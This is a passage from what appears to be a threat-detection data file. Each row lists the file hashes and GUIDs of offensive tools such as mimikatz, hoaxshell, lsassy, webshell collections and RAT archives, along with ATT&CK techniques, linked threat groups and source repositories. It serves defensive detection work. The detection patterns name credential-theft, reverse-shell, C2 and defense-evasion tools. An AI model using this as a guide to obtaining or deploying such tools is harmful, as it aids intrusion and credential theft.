Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","22337"
"*168ca61eb4b45c7aa5b3b60df22a0d8122dee8d127a9b8a8e3ec5f427466edf9*",".{0,1000}168ca61eb4b45c7aa5b3b60df22a0d8122dee8d127a9b8a8e3ec5f427466edf9.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","22340"
"*169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a*",".{0,1000}169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","22341"
"*16985a42507acbba7f12b23aee803be8abbc0165958698cb9d2310b47bd84c49*",".{0,1000}16985a42507acbba7f12b23aee803be8abbc0165958698cb9d2310b47bd84c49.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22343"
"*16a6b0fa183e54c07a78cdcea63df1d177aaafe8cf5737df9073e63fb03388a4*",".{0,1000}16a6b0fa183e54c07a78cdcea63df1d177aaafe8cf5737df9073e63fb03388a4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22345"
"*16ab1f4deaf16ea10b420b7f644da50978aefc3a6fff18e569f713689dbb050e*",".{0,1000}16ab1f4deaf16ea10b420b7f644da50978aefc3a6fff18e569f713689dbb050e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22347"
"*16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2*",".{0,1000}16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22349"
"*16bb30509efac0ba13c42eade477ab4454c5951c1c20f7c991c62798284aa3b0*",".{0,1000}16bb30509efac0ba13c42eade477ab4454c5951c1c20f7c991c62798284aa3b0.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","22350"
"*16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e*",".{0,1000}16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","22351"
"*16c7ff461f2dbc21d705c9a458901ad48a5c830eb7e4e472b0df65634f850434*",".{0,1000}16c7ff461f2dbc21d705c9a458901ad48a5c830eb7e4e472b0df65634f850434.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22353"
"*16d582a5722d39a87d530e62c732864b8eeb9b039ca9b769888e53539b21371e*",".{0,1000}16d582a5722d39a87d530e62c732864b8eeb9b039ca9b769888e53539b21371e.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","22355"
"*16d765e024adacabe84e9fd889030f5481546ef711bba0043e7e84eadd257d1a*",".{0,1000}16d765e024adacabe84e9fd889030f5481546ef711bba0043e7e84eadd257d1a.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#filehash #linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","22356"
"*16df73e36a53fb2a7c2a022c36d999a853c3e616ae4de7c3633a8d7769e81ec5*",".{0,1000}16df73e36a53fb2a7c2a022c36d999a853c3e616ae4de7c3633a8d7769e81ec5.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","22358"
"*16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218*",".{0,1000}16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22359"
"*16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50*",".{0,1000}16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22360"
"*16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b*",".{0,1000}16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","#filehash","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","22361"
"*16ed8368d7cfd8a298d59ebb123c5724fa3c8f04097e6993aa06b32aab41b263*",".{0,1000}16ed8368d7cfd8a298d59ebb123c5724fa3c8f04097e6993aa06b32aab41b263.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22364"
"*16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d*",".{0,1000}16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","#filehash","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","22365"
"*16ee86e4a45505a595d74043dabe9e22f0c8860f593c215ccf1c3eedf973e9dc*",".{0,1000}16ee86e4a45505a595d74043dabe9e22f0c8860f593c215ccf1c3eedf973e9dc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22366"
"*16fe7dadefa2d2331f40b56595f695a5d4852c2bba909fd099d4cb4d3bcbd90b*",".{0,1000}16fe7dadefa2d2331f40b56595f695a5d4852c2bba909fd099d4cb4d3bcbd90b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22367"
"*16fef0c5d8dd0db6c928502541365471234fd1b5a8e7f8b2ea94c016d98afe5b*",".{0,1000}16fef0c5d8dd0db6c928502541365471234fd1b5a8e7f8b2ea94c016d98afe5b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22368"
"*16fef3f7f220a758a571905bad6800a58c249af4d9a0ca47eb097c07e774250f*",".{0,1000}16fef3f7f220a758a571905bad6800a58c249af4d9a0ca47eb097c07e774250f.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22369"
"*1701b144ea17db4842862f5187b1ab99eb39df2a6adc7a0f4246dc40c5d63a05*",".{0,1000}1701b144ea17db4842862f5187b1ab99eb39df2a6adc7a0f4246dc40c5d63a05.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22370"
"*170c9351717e67cda6f3cfa73196c32462e63c87a07336821668b38bd0e1cf01*",".{0,1000}170c9351717e67cda6f3cfa73196c32462e63c87a07336821668b38bd0e1cf01.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22371"
"*1710e817fd36ff421632d2b1ad6335065d4323413965cb281a9fe9f363dd5258*",".{0,1000}1710e817fd36ff421632d2b1ad6335065d4323413965cb281a9fe9f363dd5258.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22372"
"*1713dc00a8573685838379ce680f6ee1ffbb4a3231ccc0ad4cf45fd9f3b3f837*",".{0,1000}1713dc00a8573685838379ce680f6ee1ffbb4a3231ccc0ad4cf45fd9f3b3f837.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22373"
"*17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74*",".{0,1000}17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22374"
"*171A9A71-EDEF-4891-9828-44434A00585E*",".{0,1000}171A9A71\-EDEF\-4891\-9828\-44434A00585E.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","22376"
"*171b5c5e7631493dd1959913d21a9f94d75079507fa321f5fa61d37df07866b9*",".{0,1000}171b5c5e7631493dd1959913d21a9f94d75079507fa321f5fa61d37df07866b9.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","22377"
"*171f2fb14b88f54e6a6c233a81ee5183ef8f65d614fac527f303bda60a8dc533*",".{0,1000}171f2fb14b88f54e6a6c233a81ee5183ef8f65d614fac527f303bda60a8dc533.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","22378"
"*1723ab71aa08741de80ab99fa08291b4066e632466c47ade2884b3739bf244b0*",".{0,1000}1723ab71aa08741de80ab99fa08291b4066e632466c47ade2884b3739bf244b0.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#filehash","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","22379"
"*17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c*",".{0,1000}17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","#filehash","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","22380"
"*1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936*",".{0,1000}1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22381"
"*17332F12-D796-42D1-9A3E-460590A49382*",".{0,1000}17332F12\-D796\-42D1\-9A3E\-460590A49382.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","22382"
"*17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94*",".{0,1000}17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22383"
"*173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d*",".{0,1000}173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22384"
"*174026948da91b966d499e4e3cf3ae425588fbcf792a76c5c18072df00112311*",".{0,1000}174026948da91b966d499e4e3cf3ae425588fbcf792a76c5c18072df00112311.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22385"
"*1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a*",".{0,1000}1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","22388"
"*1754f83853b70d8c2171902204aae31c6a26c0eb8f201092522c0a9d4e026f0b*",".{0,1000}1754f83853b70d8c2171902204aae31c6a26c0eb8f201092522c0a9d4e026f0b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","22389"
"*17589EA6-FCC9-44BB-92AD-D5B3EEA6AF03*",".{0,1000}17589EA6\-FCC9\-44BB\-92AD\-D5B3EEA6AF03.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#GUIDproject","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","22390"
"*175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178*",".{0,1000}175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22391"
"*175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178*",".{0,1000}175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22392"
"*176528ecba1bee91a831b36e3829803526e329f755af06e6ab14b57ac51df58c*",".{0,1000}176528ecba1bee91a831b36e3829803526e329f755af06e6ab14b57ac51df58c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22394"
"*176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3*",".{0,1000}176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22395"
"*176fdbab2521f29e514c62db9038532ab5b591bf7a337d192e7710daf1c39de2*",".{0,1000}176fdbab2521f29e514c62db9038532ab5b591bf7a337d192e7710daf1c39de2.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","22397"
